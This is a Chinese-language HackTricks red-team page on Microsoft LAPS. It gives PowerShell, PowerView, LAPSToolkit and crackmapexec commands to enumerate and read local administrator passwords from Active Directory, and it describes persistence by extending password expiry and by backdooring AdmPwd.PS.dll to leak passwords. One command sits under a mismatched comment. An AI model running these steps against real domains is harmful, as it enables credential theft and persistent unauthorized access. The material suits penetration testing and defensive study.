LAPS

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS红队专家）！

你在网络安全公司工作吗？想要看到你的公司在HackTricks中宣传吗？或者想要获取PEASS的最新版本或下载HackTricks的PDF吗？查看订阅计划!
发现我们的独家NFTs收藏品The PEASS Family
获取官方PEASS和HackTricks周边
加入 💬 Discord群 或 电报群 或在Twitter上关注我 🐦@carlospolopm。
通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。

基本信息

本地管理员密码解决方案（LAPS）是一种用于管理系统的工具，其中管理员密码是唯一的、随机的，并经常更改，应用于加入域的计算机。这些密码安全地存储在Active Directory中，只有通过访问控制列表（ACLs）授予权限的用户才能访问。通过使用Kerberos版本5和高级加密标准（AES），确保了从客户端到服务器的密码传输的安全性。

在域的计算机对象中，LAPS的实施会添加两个新属性：ms-mcs-AdmPwd和ms-mcs-AdmPwdExpirationTime。这些属性分别存储明文管理员密码和其过期时间。

检查是否已激活

reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled

dir "C:\Program Files\LAPS\CSE"
# Check if that folder exists and contains AdmPwd.dll

# Find GPOs that have "LAPS" or some other descriptive term in the name
Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl

# Search computer objects where the ms-Mcs-AdmPwdExpirationTime property is not null (any Domain User can read this property)
Get-DomainObject -SearchBase "LDAP://DC=sub,DC=domain,DC=local" | ? { $_."ms-mcs-admpwdexpirationtime" -ne $null } | select DnsHostname

LAPS密码访问

您可以从 \\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol 下载原始的LAPS策略，然后使用 GPRegistryPolicyParser 包中的 Parse-PolFile 来将此文件转换为可读格式。

此外，如果我们可以访问的机器上安装了本机LAPS PowerShell cmdlet，也可以使用：

Get-Command *AdmPwd*

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Cmdlet          Find-AdmPwdExtendedRights                          5.0.0.0    AdmPwd.PS
Cmdlet          Get-AdmPwdPassword                                 5.0.0.0    AdmPwd.PS
Cmdlet          Reset-AdmPwdPassword                               5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdAuditing                                 5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdComputerSelfPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdReadPasswordPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdResetPasswordPermission                  5.0.0.0    AdmPwd.PS
Cmdlet          Update-AdmPwdADSchema                              5.0.0.0    AdmPwd.PS

# List who can read LAPS password of the given OU
Find-AdmPwdExtendedRights -Identity Workstations | fl

# Read the password
Get-AdmPwdPassword -ComputerName wkstn-2 | fl

PowerView 也可以用来查找谁可以读取密码并读取它：

# Find the principals that have ReadPropery on ms-Mcs-AdmPwd
Get-AdmPwdPassword -ComputerName wkstn-2 | fl

# Read the password
Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwd

LAPSToolkit

LAPSToolkit 简化了对启用了 LAPS 的所有计算机进行枚举的过程。其中一个功能是解析**ExtendedRights以查找启用了 LAPS 的所有计算机**。这将显示专门委派为读取 LAPS 密码的组，通常是受保护组中的用户。一个加入计算机到域的帐户会在该主机上获得All Extended Rights，这个权限赋予了该帐户读取密码的能力。枚举可能会显示一个可以在主机上读取 LAPS 密码的用户帐户。这可以帮助我们针对特定的 AD 用户，他们可以读取 LAPS 密码。

# Get groups that can read passwords
Find-LAPSDelegatedGroups

OrgUnit                                           Delegated Groups
-------                                           ----------------
OU=Servers,DC=DOMAIN_NAME,DC=LOCAL                DOMAIN_NAME\Domain Admins
OU=Workstations,DC=DOMAIN_NAME,DC=LOCAL           DOMAIN_NAME\LAPS Admin

# Checks the rights on each computer with LAPS enabled for any groups
# with read access and users with "All Extended Rights"
Find-AdmPwdExtendedRights
ComputerName                Identity                    Reason
------------                --------                    ------
MSQL01.DOMAIN_NAME.LOCAL    DOMAIN_NAME\Domain Admins   Delegated
MSQL01.DOMAIN_NAME.LOCAL    DOMAIN_NAME\LAPS Admins     Delegated

# Get computers with LAPS enabled, expirations time and the password (if you have access)
Get-LAPSComputers
ComputerName                Password       Expiration
------------                --------       ----------
DC01.DOMAIN_NAME.LOCAL      j&gR+A(s976Rf% 12/10/2022 13:24:41

使用Crackmapexec转储LAPS密码

如果没有访问powershell的权限，您可以通过LDAP远程滥用此特权。

crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps

LAPS持久性

过期日期

一旦获得管理员权限，就有可能获取密码并通过将过期日期设置为未来日期来阻止计算机更新其密码，从而获得更好的立足点。

# Get expiration time
Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime

# Change expiration time
## It's needed SYSTEM on the computer
Set-DomainObject -Identity wkstn-2 -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}

如果管理员使用**Reset-AdmPwdPassword命令; 或者在 LAPS GPO 中启用了不允许密码过期时间超过策略要求**，密码仍然会被重置。

后门

LAPS 的原始源代码可以在这里找到，因此可以在代码中放置一个后门（例如在 Main/AdmPwd.PS/Main.cs 中的 Get-AdmPwdPassword 方法内），以某种方式外泄新密码或将其存储在某处。

然后，只需编译新的 AdmPwd.PS.dll 并将其上传到机器上的 C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dll（并更改修改时间）。

参考资料

https://4sysops.com/archives/introduction-to-microsoft-laps-local-administrator-password-solution/

Websec | Uw Cybersecurity Specialist

从零开始学习 AWS 黑客技术，成为专家 htARTE（HackTricks AWS 红队专家）！

您在网络安全公司工作吗？您想看到您的公司在 HackTricks 中做广告吗？或者您想访问PEASS 的最新版本或下载 PDF 格式的 HackTricks吗？请查看订阅计划!
发现我们的独家NFTs收藏品The PEASS Family
获取官方 PEASS & HackTricks 商品
加入💬 Discord 群组](https://discord.gg/hRep4RUj7f) 或 电报群组 或在 Twitter 🐦@carlospolopm** 上关注我。**
通过向 hacktricks 仓库 和 hacktricks-cloud 仓库 提交 PR 来分享您的黑客技巧。

上一页Kerberos Double Hop Problem 下一页MSSQL AD Abuse

最后更新于6天前